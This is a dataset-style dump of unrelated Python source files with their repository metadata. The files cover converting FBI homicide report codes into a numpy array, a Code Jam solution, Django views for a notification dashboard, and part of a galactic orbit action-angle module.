homicide = {1 : "MURDER AND NONNEGLIGENT MANSLAUGHTER",
            2 : "MANSLAUGHTER BY NEGLIGENCE"}
# Situation codes (victim/offender multiplicity).
situation = {1 : "SINGLE VICTIM; SINGLE OFFENDER",
             2 : "SINGLE VICTIM; UNKNOWN OFFENDER(S)",
             3 : "SINGLE VICTIM; MULTIPLE OFFENDERS",
             4 : "MULTIPLE VICTIMS; SINGLE OFFENDER",
             5 : "MULTIPLE VICTIMS; MULTIPLE OFFENDERS",
             6 : "MULTIPLE VICTIMS; UNKNOWN OFFENDER(S)"}
# Special age codes (numeric ages are stored directly; see convAge).
age = { 00 : 'UNKNOWN',
        'BB' : "7 DAYS OLD TO 364 DAYS OLD",
        'NB' : "BIRTH TO 6 DAYS OLD"}
# Sex codes.
sex = {1 : "MALE",
       2 : "FEMALE",
       3 : "UNKNOWN"}
# Weapon codes.
weapon = {1 : "FIREARM, TYPE NOT STATED (DOES NOT INCLUDE MECHANIC'S GREASE GUN OR CAULKING GUN)",
          2 : "HANDGUN - PISTOL, REVOLVER, ETC.",
          3 : "RIFLE",
          4 : "SHOTGUN",
          5 : "OTHER GUN / UNKNOWN GUN",
          6 : "KNIFE OR CUTTING INSTRUMENT - INCLUDES ICEPICK, SCREWDRIVER, AX, ETC.",
          7 : "BLUNT OBJECT - HAMMER, CLUB, ETC. FACTS MUST SUGGEST WEAPON WAS NOT HANDS AND FEET.",
          8 : "PERSONAL WEAPONS - INCLUDES BEATING BY HANDS, FEET, AND OTHER BODY MEMBERS OR USE OF TEETH",
          9 : "POISON - DOES NOT INCLUDE GAS",
          10 : "PUSHED OR THROWN OUT WINDOW",
          11 : "EXPLOSIVES",
          12 : "FIRE",
          13 : "NARCOTICS AND DRUGS - INCLUDES SLEEPING PILLS",
          14 : "DROWNING",
          15 : "STRANGULATION - HANGING.",
          16 : "ASPHYXIATION - INCLUDES ASPHYXIATION OR DEATH BY GAS",
          17 : "OTHER- TYPE OF WEAPON NOT DESIGNED OR TYPE UNKNOWN"}
# Offender-to-victim relationship codes.
relationship = {1 : "HUSBAND",
                2 : "WIFE",
                3 : "COMMON-LAW HUSBAND",
                4 : "COMMON-LAW WIFE",
                5 : "MOTHER",
                6 : "FATHER",
                7 : "SON",
                8 : "DAUGHTER",
                9 : "BROTHER",
                10 : "SISTER",
                11 : "IN-LAW",
                12 : "STEPFATHER",
                13 : "STEPMOTHER",
                14 : "STEPSON",
                15 : "STEPDAUGHTER",
                16 : "OTHER FAMILY",
                17 : "NEIGHBOR",
                18 : "ACQUAINTANCE",
                19 : "BOYFRIEND",
                20 : "GIRLFRIEND",
                21 : "EX-HUSBAND",
                22 : "EX-WIFE",
                23 : "EMPLOYEE",
                24 : "EMPLOYER",
                25 : "FRIEND",
                26 : "HOMOSEXUAL RELATIONSHIP",
                27 : "OTHER - KNOWN TO VICTIM",
                28 : "STRANGER",
                29 : "UNKNOWN"}
# Circumstance codes (canonical set; see convCircum for normalization).
circumstances = {2 : "RAPE",
                 3 : "ROBBERY",
                 5 : "BURGLARY",
                 6 : "LARCENY",
                 7 : "MOTOR VEHICLE THEFT",
                 9 : "ARSON",
                 10 : "PROSTITUTION AND COMMERCIALIZED VICE",
                 17 : "OTHER SEX OFFENSE",
                 18 : "NARCOTIC DRUG LAWS",
                 32 : "ABORTION",
                 19 : "GAMBLING",
                 26 : "OTHER - FELONY TYPE",
                 40 : "LOVER'S TRIANGLE",
                 41 : "CHILD KILLED BY BABYSITTER",
                 42 : "BRAWL DUE TO INFLUENCE OF ALCOHOL",
                 43 : "BRAWL DUE TO INFLUENCE OF NARCOTICS",
                 44 : "ARGUMENT OVER MONEY OR PROPERTY",
                 45 : "OTHER ARGUMENTS",
                 46 : "GANGLAND KILLINGS",
                 47 : "JUVENILE GANG KILLINGS",
                 48 : "INSTITUTIONAL KILLINGS",
                 49 : "SNIPER ATTACK",
                 50 : "VICTIM SHOT IN HUNTING ACCIDENT",
                 51 : "GUNCLEANING DEATH OTHER THAN SELF-INFLICTED",
                 52 : "CHILDREN PLAYING WITH GUN",
                 53 : "OTHER NEGLIGENT HANDLING OF GUN WHICH RESULTS IN DEATH",
                 59 : "ALL OTHER MANSLAUGHTER BY NEGLIGENCE",
                 60 : "OTHER NON-FELONY TYPE",
                 70 : "ALL SUSPECTED FELONY TYPE",
                 80 : "JUSTIFIABLE HOMICIDE - CIVILIAN",
                 81 : "JUSTIFIABLE HOMICIDE - POLICE",
                 99 : "ALL INSTANCES WHERE FACTS PROVIDED DO NOT PERMIT DETERMINATION"}
# Sub-circumstance codes (see convSubCircum for normalization).
subCircum = {1 : "FELON ATTACKED POLICE OFFICER",
             2 : "FELON ATTACKED FELLOW POLICE OFFICER",
             3 : "FELON ATTACKED CIVILIAN",
             4 : "FELON ATTEMPTED FLIGHT FROM CRIME",
             5 : "FELON KILLED IN COMMISSION OF CRIME",
             6 : "FELON RESISTED ARREST",
             7 : "NOT ENOUGH INFORMATION TO DETERMINE"}
def gather_type_1(d, a, y):
    """Normalize type-1 raw records into output rows.

    d -- iterable of raw field lists (one per record)
    a -- output list; one array per record is appended
    y -- year tag written into every row

    In this layout the victim ages and sexes live in two parallel runs
    (indices 24-33 and 34-43) and the six offender attributes live in
    six parallel runs of 11 starting at 64, 75, 108, 119, 130 and 141.
    The original hand-unrolled appends are collapsed into loops over
    those offsets; this kind of copy-paste unrolling is exactly what
    produced index typos elsewhere in this file.
    """
    for m in d:
        n = [y,                          # year
             int(m[16]),                 # month
             m[4],                       # state
             groupConvert(m[7], m[8]),   # group
             int(m[10]),                 # population
             int(m[13]),                 # MSA indication
             int(m[12]),                 # MSA code
             typeConvert(m[19]),         # type of homicide
             sitConvert(m[21]),          # situation
             int(m[22]) + 1,             # victim count
             int(m[23]) + 1]             # offender count
        # victims 1-10: parallel age / sex runs
        for i in range(10):
            n.append(int(m[24 + i]))      # victim i+1 age
            n.append(convSex(m[34 + i]))  # victim i+1 sex
        # this record type has no victim-11 slot; emit the unknown markers
        n.append(convAge(None))
        n.append(convSex('9'))
        # offenders 1-11: six parallel attribute runs
        for i in range(11):
            n.append(int(m[64 + i]))             # age
            n.append(convSex(m[75 + i]))         # sex
            n.append(convWeap(m[108 + i]))       # weapon
            n.append(convRelation(m[119 + i]))   # relationship to victim 1
            n.append(convCircum(m[130 + i]))     # circumstance
            n.append(convSubCircum(m[141 + i]))  # sub-circumstance
        a.append(array(n))
def gather_type_2(d, a, y):
    """Normalize type-2 raw records into output rows.

    d -- iterable of raw field lists (one per record)
    a -- output list; one array per record is appended
    y -- year tag written into every row

    In this layout victims 1-10 are stride-4 records starting at index
    24 (only the age and sex fields are used) and offenders 1-11 are
    stride-8 records starting at index 68 (age, sex, then weapon /
    relationship / circumstance / sub-circumstance at offsets 4-7).
    The original hand-unrolled appends are collapsed into loops over
    those offsets.
    """
    for m in d:
        n = [y,                          # year
             int(m[16]),                 # month
             m[5],                       # state
             groupConvert(None, m[7]),   # group
             int(m[10]),                 # population
             int(m[13]),                 # MSA indication
             int(m[12]),                 # MSA code
             typeConvert(m[19]),         # type of homicide
             sitConvert(m[21]),          # situation
             int(m[22]) + 1,             # victim count
             int(m[23]) + 1]             # offender count
        # victims 1-10: age at the record base, sex one past it
        for base in range(24, 64, 4):
            n.append(int(m[base]))
            n.append(convSex(m[base + 1]))
        # this record type has no victim-11 slot; emit the unknown markers
        n.append(convAge(None))
        n.append(convSex('9'))
        # offenders 1-11
        for base in range(68, 156, 8):
            n.append(int(m[base]))               # age
            n.append(convSex(m[base + 1]))       # sex
            n.append(convWeap(m[base + 4]))      # weapon
            n.append(convRelation(m[base + 5]))  # relationship to victim 1
            n.append(convCircum(m[base + 6]))    # circumstance
            n.append(convSubCircum(m[base + 7])) # sub-circumstance
        a.append(array(n))
def gather_type_3(d, a, y):
    """Normalize type-3 raw records into output rows.

    d -- iterable of raw field lists (one per record)
    a -- output list; one array per record is appended
    y -- year tag written into every row

    In this layout victim 1 (indices 18-19) and offender 1 (22-29) are
    embedded near the record head; victims 2-11 are stride-4 records
    starting at 32 and offenders 2-11 are stride-8 records starting at
    72.  All ages go through convAge and the MSA code may be missing
    (convMSACode).  The original hand-unrolled appends are collapsed
    into loops over those offsets.
    """
    for m in d:
        n = [y,                          # year
             int(m[12]),                 # month
             m[1],                       # state
             groupConvert(None, m[3]),   # group
             int(m[6]),                  # population
             int(m[9]),                  # MSA indication
             convMSACode(m[8]),          # MSA code (may be absent)
             typeConvert(m[15]),         # type of homicide
             sitConvert(m[17]),          # situation
             int(m[30]) + 1,             # victim count
             int(m[31]) + 1]             # offender count
        # victim 1 sits at the record head
        n.append(convAge(m[18]))
        n.append(convSex(m[19]))
        # victims 2-11
        for base in range(32, 72, 4):
            n.append(convAge(m[base]))
            n.append(convSex(m[base + 1]))
        # offender 1 also sits at the record head
        n.append(convAge(m[22]))             # age
        n.append(convSex(m[23]))             # sex
        n.append(convWeap(m[26]))            # weapon
        n.append(convRelation(m[27]))        # relationship to victim 1
        n.append(convCircum(m[28]))          # circumstance
        n.append(convSubCircum(m[29]))       # sub-circumstance
        # offenders 2-11
        for base in range(72, 152, 8):
            n.append(convAge(m[base]))           # age
            n.append(convSex(m[base + 1]))       # sex
            n.append(convWeap(m[base + 4]))      # weapon
            n.append(convRelation(m[base + 5]))  # relationship to victim 1
            n.append(convCircum(m[base + 6]))    # circumstance
            n.append(convSubCircum(m[base + 7])) # sub-circumstance
        a.append(array(n))
def gather_type_4(d, a, y):
    """Normalize type-4 raw records into output rows.

    d -- iterable of raw field lists (one per record)
    a -- output list; one array per record is appended
    y -- year tag written into every row

    In this layout victims 1-11 are stride-4 records starting at index
    24 (ages parsed with int, i.e. assumed always numeric) and
    offenders 1-11 are stride-8 records starting at index 68.  The
    original hand-unrolled appends are collapsed into loops over those
    offsets.
    """
    for m in d:
        n = [y,                          # year
             int(m[16]),                 # month
             m[4],                       # state
             groupConvert(m[7], m[8]),   # group
             int(m[10]),                 # population
             int(m[13]),                 # MSA indication
             int(m[12]),                 # MSA code
             typeConvert(m[19]),         # type of homicide
             sitConvert(m[21]),          # situation
             int(m[22]) + 1,             # victim count
             int(m[23]) + 1]             # offender count
        # victims 1-11: age at the record base, sex one past it
        for base in range(24, 68, 4):
            n.append(int(m[base]))
            n.append(convSex(m[base + 1]))
        # offenders 1-11
        for base in range(68, 156, 8):
            n.append(int(m[base]))               # age
            n.append(convSex(m[base + 1]))       # sex
            n.append(convWeap(m[base + 4]))      # weapon
            n.append(convRelation(m[base + 5]))  # relationship to victim 1
            n.append(convCircum(m[base + 6]))    # circumstance
            n.append(convSubCircum(m[base + 7])) # sub-circumstance
        a.append(array(n))
def gather_type_5(d, a, y):
    """Normalize type-5 raw records into output rows.

    d -- iterable of raw field lists (one per record)
    a -- output list; one array per record is appended
    y -- year tag written into every row

    Same layout as type 4 except that the state lives at index 5, the
    group field is single (groupConvert(None, m[7])) and victim ages go
    through convAge (they may carry 'BB'/'NB'/None codes).  Victims
    1-11 are stride-4 records from index 24; offenders 1-11 are
    stride-8 records from index 68.  The original hand-unrolled appends
    are collapsed into loops over those offsets.
    """
    for m in d:
        n = [y,                          # year
             int(m[16]),                 # month
             m[5],                       # state
             groupConvert(None, m[7]),   # group
             int(m[10]),                 # population
             int(m[13]),                 # MSA indication
             int(m[12]),                 # MSA code
             typeConvert(m[19]),         # type of homicide
             sitConvert(m[21]),          # situation
             int(m[22]) + 1,             # victim count
             int(m[23]) + 1]             # offender count
        # victims 1-11: age at the record base, sex one past it
        for base in range(24, 68, 4):
            n.append(convAge(m[base]))
            n.append(convSex(m[base + 1]))
        # offenders 1-11 (ages assumed numeric: parsed with int)
        for base in range(68, 156, 8):
            n.append(int(m[base]))               # age
            n.append(convSex(m[base + 1]))       # sex
            n.append(convWeap(m[base + 4]))      # weapon
            n.append(convRelation(m[base + 5]))  # relationship to victim 1
            n.append(convCircum(m[base + 6]))    # circumstance
            n.append(convSubCircum(m[base + 7])) # sub-circumstance
        a.append(array(n))
def gather_type_6(d,a,y):
    """Convert one year of 'type 6' format SHR records into numeric rows.

    Parameters
    ----------
    d : iterable of sequences -- raw parsed records for one year
    a : list -- output accumulator; one numpy array is appended per record
    y : int -- calendar year stamped on every row

    Column layout per record m: victim age/sex pairs for victims 2..11 sit
    at stride-4 offsets starting at m[36]; offender field groups for
    offenders 2..11 sit at stride-8 offsets starting at m[76].
    """
    for m in d:
        n = []
        n.append(y)                      # year
        n.append(int(m[16]))             # month
        n.append(m[5])                   # state
        n.append(groupConvert(None,m[7]))  # group
        n.append(int(m[10]))             # population
        # agency code m[6] / agency name m[14] deliberately omitted
        n.append(int(m[13]))             # MSA indication
        n.append(int(m[12]))             # MSA code
        n.append(typeConvert(m[19]))     # type of homicide
        n.append(sitConvert(m[21]))      # situation
        n.append(int(m[34]) + 1)         # victim count
        n.append(int(m[35]) + 1)         # offender count
        # victim 1
        n.append(convAge(m[22]))         # victim 1 age
        n.append(convSex(m[23]))         # victim 1 sex
        # victims 2..11: age/sex pairs every 4 columns starting at m[36].
        # BUGFIX: the original read m[69] (the victim-10 *sex* column) for
        # victim 8's age; the stride pattern (36,40,...,72) dictates m[60].
        for base in range(36, 76, 4):
            n.append(convAge(m[base]))       # victim k age
            n.append(convSex(m[base + 1]))   # victim k sex
        # offender 1 (note: age is a plain int here, unlike the victims)
        n.append(int(m[26]))             # offender 1 age
        n.append(convSex(m[27]))         # offender 1 sex
        n.append(convWeap(m[30]))        # offender 1 weapon
        n.append(convRelation(m[31]))    # offender 1 relationship to victim 1
        n.append(convCircum(m[32]))      # offender 1 circumstance
        n.append(convSubCircum(m[33]))   # offender 1 sub-circumstance
        # offenders 2..11: 8-column groups starting at m[76]
        for base in range(76, 156, 8):
            n.append(int(m[base]))               # age
            n.append(convSex(m[base + 1]))       # sex
            n.append(convWeap(m[base + 4]))      # weapon
            n.append(convRelation(m[base + 5]))  # relationship to victim 1
            n.append(convCircum(m[base + 6]))    # circumstance
            n.append(convSubCircum(m[base + 7])) # sub-circumstance
        a.append(array(n))
def gather_type_7(d,a,y):
    """Translate one year of 'type 7' format records into numeric rows.

    Appends one numpy array per record of d to the accumulator a; y is
    the calendar year written into the first column of every row.
    """
    for m in d:
        row = []
        row.append(y)                       # year
        row.append(int(m[12]))              # month
        row.append(m[1])                    # state
        row.append(groupConvert(None,m[3])) # group
        row.append(int(m[6]))               # population
        # agency code m[2] / agency name m[10] deliberately skipped
        row.append(int(m[9]))               # MSA indication
        row.append(convMSACode(m[8]))       # MSA code
        row.append(typeConvert(m[15]))      # type of homicide
        row.append(sitConvert(m[17]))       # situation
        row.append(int(m[30]) + 1)          # victim count
        row.append(int(m[31]) + 1)          # offender count
        # victim 1 lives at m[18]/m[19]; victims 2..11 follow in
        # 4-column strides starting at m[32].
        row.append(convAge(m[18]))
        row.append(convSex(m[19]))
        for base in range(32, 72, 4):
            row.append(convAge(m[base]))       # victim k age
            row.append(convSex(m[base + 1]))   # victim k sex
        # offender 1 occupies m[22..29]; offenders 2..9 follow in
        # 8-column strides starting at m[72]. All share one field layout:
        # age, sex, (skip 2), weapon, relationship, circumstance, sub-circ.
        for base in (22,) + tuple(range(72, 136, 8)):
            row.append(convAge(m[base]))
            row.append(convSex(m[base + 1]))
            row.append(convWeap(m[base + 4]))
            row.append(convRelation(m[base + 5]))
            row.append(convCircum(m[base + 6]))
            row.append(convSubCircum(m[base + 7]))
        # offender 10: this format appears to lack a sub-circumstance
        # column for the tenth offender, so it is filled with the
        # missing-value code (matching the original behaviour).
        row.append(convAge(m[136]))
        row.append(convSex(m[137]))
        row.append(convWeap(m[140]))
        row.append(convRelation(m[141]))
        row.append(convCircum(m[142]))
        row.append(convSubCircum(None))
        # offender 11: not present in this format -- pad with sentinels.
        row.append(convAge(None))
        row.append(convSex('9'))
        row.append(convWeap(None))
        row.append(convRelation('99'))
        row.append(convCircum(None))
        row.append(convSubCircum(None))
        a.append(array(row))
# Assemble the master array: each yearly raw table is converted with the
# gather_* routine matching that year's file format (the source format
# changed several times over the decades, hence the mix of type 1..7
# converters).
data = []
gather_type_1(d1976, data, 1976)
gather_type_1(d1977, data, 1977)
gather_type_1(d1978, data, 1978)
gather_type_1(d1979, data, 1979)
gather_type_2(d1980, data, 1980)
gather_type_2(d1981, data, 1981)
gather_type_2(d1982, data, 1982)
gather_type_3(d1983, data, 1983)
gather_type_1(d1984, data, 1984)
gather_type_1(d1985, data, 1985)
gather_type_1(d1986, data, 1986)
gather_type_4(d1987, data, 1987)
gather_type_4(d1988, data, 1988)
gather_type_4(d1989, data, 1989)
gather_type_4(d1990, data, 1990)
gather_type_4(d1991, data, 1991)
gather_type_4(d1992, data, 1992)
gather_type_5(d1993, data, 1993)
gather_type_6(d1994, data, 1994)
gather_type_6(d1995, data, 1995)
gather_type_6(d1996, data, 1996)
gather_type_6(d1997, data, 1997)
gather_type_3(d1998, data, 1998)
gather_type_3(d1999, data, 1999)
gather_type_3(d2000, data, 2000)
gather_type_3(d2001, data, 2001)
gather_type_7(d2002, data, 2002)
gather_type_7(d2003, data, 2003)
gather_type_7(d2004, data, 2004)
gather_type_7(d2005, data, 2005)
gather_type_7(d2006, data, 2006)
gather_type_7(d2007, data, 2007)
gather_type_7(d2008, data, 2008)
gather_type_7(d2009, data, 2009)
gather_type_7(d2010, data, 2010)
gather_type_7(d2011, data, 2011)
gather_type_7(d2012, data, 2012)
# Stack per-record rows into one integer matrix and write it with numpy's
# binary format (produces data/data.npy).
data = array(data).astype('i')
save('data/data', data)
| [
"cummings.evan@gmail.com"
] | cummings.evan@gmail.com |
1f956806ded26833499f7cf94f5aa6c07baf85ca | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_62/226.py | 7ad140bdb3f8909e25cea0499824da525e9f42ab | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | fi=open("A-large.in")#")
import sys
sys.stdout=open("out.out",'w')
T=int(fi.readline())
for i in range(T):
N=int(fi.readline())
lst=[map(int,fi.readline().split()) for j in range(N)]
cnt=0
for j in range(N):
for k in range(j+1,N):
cnt+=(lst[k][0]>lst[j][0])==(lst[k][1]<lst[j][1])
print "Case #%d: %d"%(i+1,cnt)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
d2e0473e0664d8e1a1e333368970ecc639a0840e | 1e8142725aa06844713d18fa38c6779aff8f8171 | /tndata_backend/notifications/views.py | cfeca79f817dd6db55ce8cd517ebe98b2e9b6884 | [
"MIT"
] | permissive | tndatacommons/tndata_backend | 8f4db3e5cf5272901c9087a85e21d7560240bb3b | 3d22179c581ab3da18900483930d5ecc0a5fca73 | refs/heads/master | 2020-12-03T07:53:17.339769 | 2017-03-27T06:18:58 | 2017-03-27T06:18:58 | 68,407,220 | 1 | 2 | null | 2017-03-27T06:18:59 | 2016-09-16T18:59:16 | Python | UTF-8 | Python | false | false | 6,049 | py | from collections import defaultdict
from datetime import datetime, timedelta
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.http import JsonResponse
from django.shortcuts import get_object_or_404, render, redirect
from django.utils import timezone
from . import queue
from .forms import GCMMessageForm
from .models import GCMMessage
@login_required
def send_message(request):
    """Quick form for firing off a test GCM notification.

    On a valid POST, saves a high-priority message for the current user,
    delivers it immediately, and redirects to its detail page. Otherwise
    renders the form (bound with errors after an invalid POST).
    """
    if request.method != "POST":
        context = {'form': GCMMessageForm()}
        return render(request, 'notifications/send_message.html', context)

    form = GCMMessageForm(request.POST)
    if form.is_valid():
        message = form.save(commit=False)
        message.user = request.user
        message.deliver_on = timezone.now()
        message.priority = GCMMessage.HIGH
        message.save()
        message.send()
        messages.success(request, "Your notification has been sent")
        return redirect(reverse("notifications:view", args=[message.id]))

    return render(request, 'notifications/send_message.html', {'form': form})
@login_required
def view_message(request, message_id):
    """Render the detail page for a single GCMMessage (404 if absent)."""
    gcm_message = get_object_or_404(GCMMessage, pk=message_id)
    context = {'message': gcm_message}
    return render(request, 'notifications/view_message.html', context)
@user_passes_test(lambda u: u.is_staff, login_url='/')
def dashboard(request):
    """A simple dashboard for enqueued GCM notifications.

    Optional GET parameters:
        user -- (partial) email address; shows that user's queue details.
        date -- YYYY-MM-DD snapshot date (defaults to today).
    """
    devices = None
    User = get_user_model()

    # If we have specified a user, show their Queue details.
    date = request.GET.get('date', None) or None
    if date is None:
        date = timezone.now().date()
    else:
        date = datetime.strptime(date, "%Y-%m-%d").date()

    user = None
    email = request.GET.get('user', None)
    user_queues = []  # Prioritized user queue data for `date` and the next day
    try:
        user = User.objects.get(email__icontains=email)
        devices = user.gcmdevice_set.count()
        user_queues.append(queue.UserQueue.get_data(user, date=date))
        date = date + timedelta(days=1)
        user_queues.append(queue.UserQueue.get_data(user, date=date))
    except (User.DoesNotExist, ValueError, TypeError):
        # BUGFIX: `user` is necessarily still None when the lookup raised,
        # so the previous `if user is not None` guard could never fire.
        # Warn whenever a search term was actually supplied.
        if email:
            messages.warning(request, "No data found for '{}'".format(email))
    except User.MultipleObjectsReturned:
        # BUGFIX: report the ambiguous search term; the old code formatted
        # the still-unassigned `user` variable (i.e. None).
        messages.warning(request, "Multiple Users found for '{}'".format(email))

    if user:
        # Get all the enqueued jobs, & keep a list of the Job.ID values.
        jobs = queue.messages()
        job_ids = [job.args[0] for job, _ in jobs]

        # Build a dict of the user's message data matching those Jobs.
        # (The original dict literal listed 'title' twice; once is enough.)
        message_data = defaultdict(dict)
        for msg in user.gcmmessage_set.filter(pk__in=job_ids):
            message_data[msg.id] = {
                'id': msg.id,
                'title': msg.title,
                'user_id': msg.user_id,
                'email': msg.user.email,
                'message': msg.message,
                'date_string': msg.deliver_on.strftime("%Y-%m-%d"),
                'queue_id': msg.queue_id,
            }

        # Restrict the list of jobs to those intended for the given user.
        jobs = [
            (job, scheduled_for, message_data[job.args[0]])
            for job, scheduled_for in jobs if job.args[0] in message_data
        ]
    else:
        jobs = []

    context = {
        'devices': devices,
        'email': email,
        'num_jobs': queue.get_scheduler().count(),
        'jobs': jobs,
        'metrics': ['GCM Message Sent', 'GCM Message Scheduled'],
        'selected_date': date,
        'selected_user': user,
        'user_queues': user_queues,
    }
    return render(request, "notifications/index.html", context)
@user_passes_test(lambda u: u.is_staff, login_url='/')
def userqueue(request, user_id, date):
    """Return UserQueue details as JSON: the scheduled notification jobs
    for the given user on the given YYYY-MM-DD date."""
    user = get_object_or_404(get_user_model(), pk=user_id)
    when = datetime.strptime(date, '%Y-%m-%d')
    raw = queue.UserQueue.get_data(user, when)

    # Collapse the raw queue keys down to a fixed set of buckets; the
    # first matching substring wins (same precedence as before: count,
    # then low / medium / high).
    results = {}
    for key, values in raw.items():
        for bucket in ('count', 'low', 'medium', 'high'):
            if bucket in key:
                results[bucket] = values
                break
    results['date'] = when.strftime("%Y-%m-%d")
    results['user'] = user.get_full_name()
    return JsonResponse(results)
@user_passes_test(lambda u: u.is_staff, login_url='/')
def cancel_job(request):
    """Cancel the enqueued notification job whose id was POSTed."""
    job_id = request.POST.get('job_id', None)
    if request.method == "POST" and job_id:
        # Find the first (and only) scheduled job with a matching id.
        matches = (job for job, _ in queue.messages() if job.id == job_id)
        job = next(matches, None)
        if job is not None:
            job.cancel()
            messages.success(request, "That notification has been cancelled")
    return redirect("notifications:dashboard")
@user_passes_test(lambda u: u.is_staff, login_url='/')
def cancel_all_jobs(request):
    """Cancels queued messages.

    With the 'orphaned' checkbox set, only cancels jobs whose GCMMessage
    row no longer exists (e.g. a user was deleted without the delete
    signal firing); otherwise cancels every queued job.
    """
    count = 0
    if request.method == "POST":
        if request.POST.get('orphaned') == 'on':
            known_ids = set(GCMMessage.objects.values_list('queue_id', flat=True))
            to_cancel = [job for job, _ in queue.messages()
                         if job.id not in known_ids]
        else:
            to_cancel = [job for job, _ in queue.messages()]
        for job in to_cancel:
            job.cancel()
            count += 1
    messages.success(request, "Cancelled {} notifications.".format(count))
    return redirect("notifications:dashboard")
| [
"brad@bradmontgomery.net"
] | brad@bradmontgomery.net |
230162e5df126366654a8c367c828b2b6bc6631e | 0ef635d35345f624c3011c1d7d296df96a7c6433 | /gala/dynamics/_genfunc/genfunc_3d.py | 013e78fb187b8b91795c531836549dc7b1ab7ad7 | [
"MIT",
"MPL-1.1"
] | permissive | cbjuan/gala | edd07d08f5a741d5b15848cbd6ab25872ca941a5 | bf1d616258b3856da7550eddf49cf26ec9865996 | refs/heads/master | 2020-04-08T23:58:21.360489 | 2018-11-24T01:56:08 | 2018-11-24T01:56:08 | 159,847,691 | 1 | 0 | MIT | 2018-11-30T16:09:34 | 2018-11-30T16:09:34 | null | UTF-8 | Python | false | false | 15,682 | py | # Solving the series of linear equations for true action
# and generating function Fourier components
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint
from matplotlib.ticker import MaxNLocator
import matplotlib.cm as cm
import time
# in units kpc, km/s and 10^11 M_solar
Grav = 430091.7270069976
Conv = 0.9777922216
from . import toy_potentials as toy
from . import test_potentials as pot
from . import solver
from . import visualize_surfaces as vs
from .solver import unroll_angles as ua
def choose_NT(N_max,iffreq=True):
    """Number of time samples required to constrain N_max Fourier modes
    (equation 21 of Sanders & Binney 2014). The requirement is stricter
    (and floored at 200 rather than 100) when frequencies are also fit."""
    if iffreq:
        return max(200, 9 * N_max ** 3 / 4)
    return max(100, N_max ** 3 / 2)
def check_angle_solution(ang,n_vec,toy_aa,timeseries):
    """ Plots the toy angle solution against the toy angles ---
        Takes true angles and frequencies ang (entries 0-2 initial angles,
        3-5 frequencies, the rest the generating-function coefficients in
        three equal-length groups), the Fourier vectors n_vec,
        the toy action-angles toy_aa
        and the timeseries """
    f,a=plt.subplots(3,1)
    for i in range(3):
        a[i].plot(toy_aa.T[i+3],'.')
        # NOTE: integer division intended (Python 2 semantics); the result
        # is used as a slice index below.
        size = len(ang[6:])/3
        # Generating-function correction summed over all Fourier modes.
        AA = np.array([np.sum(ang[6+i*size:6+(i+1)*size]*np.sin(np.sum(n_vec*K,axis=1))) for K in toy_aa.T[3:].T])
        # Reconstructed toy angle (mod 2*pi) from the linear angle solution.
        a[i].plot((ang[i]+ang[i+3]*timeseries-2.*AA) % (2.*np.pi),'.')
        a[i].set_ylabel(r'$\theta$'+str(i+1))
    a[2].set_xlabel(r'$t$')
    plt.show()
def check_target_angle_solution(ang,n_vec,toy_aa,timeseries):
    """ Plots the angle solution and the toy angles ---
        Takes true angles and frequencies ang,
        the Fourier vectors n_vec,
        the toy action-angles toy_aa
        and the timeseries.
        Plots the residual between the corrected toy angle and the linear
        (theta_0 + Omega*t) solution, which should be small everywhere. """
    f,a=plt.subplots(3,1)
    for i in range(3):
        # a[i].plot(toy_aa.T[i+3],'.')
        # NOTE: integer division intended (Python 2 semantics).
        size = len(ang[6:])/3
        # Generating-function correction summed over all Fourier modes.
        AA = np.array([np.sum(ang[6+i*size:6+(i+1)*size]*np.sin(np.sum(n_vec*K,axis=1))) for K in toy_aa.T[3:].T])
        a[i].plot(((toy_aa.T[i+3]+2.*AA) % (2.*np.pi))-(ang[i]+timeseries*ang[i+3]) % (2.*np.pi),'.')
        a[i].plot(toy_aa.T[i+3],'.')
        a[i].set_ylabel(r'$\theta$'+str(i+1))
    a[2].set_xlabel(r'$t$')
    plt.show()
def eval_mean_error_functions(act,ang,n_vec,toy_aa,timeseries,withplot=False):
    """ Calculates sqrt(mean(E)) and sqrt(mean(F)) -- the RMS residuals of
        the action equations (E) and angle equations (F) over the time
        series. Returns a (2, 3) array: row 0 the action residuals EJ,
        row 1 the angle residuals ET. If withplot, also shows the
        per-sample residuals for each of the three components. """
    Err = np.zeros(6)
    NT = len(timeseries)
    # NOTE: integer division intended (Python 2 semantics); used as slice index.
    size = len(ang[6:])/3
    # Unrolled (continuous, non-wrapped) toy angles.
    UA = ua(toy_aa.T[3:].T,np.ones(3))
    fig,axis=None,None
    if(withplot):
        fig,axis=plt.subplots(3,2)
        plt.subplots_adjust(wspace=0.3)
    for K in range(3):
        # Action-equation residual for component K at each time sample.
        ErrJ = np.array([(i[K]-act[K]-2.*np.sum(n_vec.T[K]*act[3:]*np.cos(np.dot(n_vec,i[3:]))))**2 for i in toy_aa])
        Err[K] = np.sum(ErrJ)
        # Angle-equation residual for component K at each time sample.
        ErrT = np.array(((ang[K]+timeseries*ang[K+3]-UA.T[K]-2.*np.array([np.sum(ang[6+K*size:6+(K+1)*size]*np.sin(np.sum(n_vec*i,axis=1))) for i in toy_aa.T[3:].T])))**2)
        Err[K+3] = np.sum(ErrT)
        if(withplot):
            axis[K][0].plot(ErrJ,'.')
            axis[K][0].set_ylabel(r'$E$'+str(K+1))
            axis[K][1].plot(ErrT,'.')
            axis[K][1].set_ylabel(r'$F$'+str(K+1))
    if(withplot):
        for i in range(3):
            axis[i][0].set_xlabel(r'$t$')
            axis[i][1].set_xlabel(r'$t$')
        plt.show()
    EJ = np.sqrt(Err[:3]/NT)
    ET = np.sqrt(Err[3:]/NT)
    return np.array([EJ,ET])
def box_actions(results, times, N_matrix, ifprint):
    """
    Finds actions, angles and frequencies for box orbit.
    Takes a series of phase-space points from an orbit integration at times t and returns
    L = (act,ang,n_vec,toy_aa, pars) -- explained in find_actions() below.
    Returns None when the toy transform or the linear solver fails.
    """
    if(ifprint):
        print("\n=====\nUsing triaxial harmonic toy potential")

    t = time.time()
    # Find best toy parameters
